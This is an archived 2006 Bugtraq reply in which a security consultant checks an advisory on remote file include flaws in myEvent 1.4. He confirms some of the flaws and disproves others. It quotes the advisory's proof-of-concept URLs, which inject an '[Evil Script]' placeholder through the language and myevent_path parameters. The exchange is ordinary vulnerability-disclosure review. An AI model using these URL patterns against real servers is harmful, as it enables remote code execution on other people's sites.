lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 13 Aug 2006 14:31:44 +0200
From: "Carsten Eilers" <ceilers-lists@....de>
To: <sh3ll@...ll.ir>, <bugtraq@...urityfocus.com>
Subject: Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities

sh3ll@...ll.ir schrieb am Sat, 12 Aug 2006 10:03:15 +0000:


>-------------admin.php--------------------------------------
>
>....
>
><?php
>
>        include_once($language);
>
>        ?>
>
>...

Take a look at config.php:

$language = "lang_eng.php";

an at admin.php:

<?
include "config.php";
include_once('includes/template.php');
include_once($language);
$template = new Template('templates/') ;


Ups... :-)

>-------------event.php--------------------------------------

This one works. BTDT.

>-------------initialize.php-----------------------------------

This one works, too. 

>-------------myevent.php------------------------------------

Have you even tried to run this script?

| Parse error: parse error in XXXXXX/myevent/myevent.php on line 4

Missing ; in line 3:

| $myevent_path =""

Oh oh...

>-------------viewevent.php-----------------------------------

This one works, too. 

>PoC:
>
>~~~
>
>http://www.target.com/[myEvent]/admin.php?language=[Evil Script]
>
>http://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]
>
>http://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]
>
>http://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]
>
>http://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]

Did you test all of them? That way?
I don't think so.

Regards
  Carsten


-- 
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ